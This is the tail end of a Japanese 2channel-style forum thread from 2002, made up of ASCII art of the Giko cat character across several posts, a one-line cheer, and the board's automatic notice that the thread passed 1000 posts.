    |__|_| |(,,゚Д゚)
    __< (ノ ニ<)
    | | | | ∞ |
    | v  |__|
    \__∠__/
       U U


995 :名無しさん@お腹いっぱい。:02/11/11 22:33

     _____
    | ___|__|
    | |__|_
    |_ \(,,゚Д゚)
    __ヽ(ノ  ̄ i)
    | | | | ∞ |
    | v  |__|
    \__∠__/
       U U

996 :名無しさん@お腹いっぱい。:02/11/11 22:34
       ____
    /   |__|
    | / ̄/
    |  ̄\(,,゚Д゚)
    | ハ (ノ  ̄ i)
    | | | | ∞ |
    | v  |__|
    \__∠__/
       U U


997 :名無しさん@お腹いっぱい。:02/11/11 22:34

    _____
     | __. |    |
     |_|_| |    |
       | |(,,゚Д゚)
       | (ノ   i)
       | | ∞ |
       | |    |
       | |__|
        ̄U U

998 :sage:02/11/11 22:34
もちょい!

999 :名無しさん@お腹いっぱい。:02/11/11 22:35

        ___
    / \  \
    | ハ .| ̄ ̄|
    | | | |(,,゚Д゚)
    | v (ノ   i)
    \__. | ∞ |
    __/ |__|
    |__∠__/
       U U


1000 :名無しさん@お腹いっぱい。:02/11/11 22:35
        ___
      / \  \
    | ハ .| ̄ ̄|
    | | | |(,,゚Д゚)
    | | | (ノ   i)
    | | | | ∞ |
    | v  |__|
    \__∠__/
       U U



1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

290 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)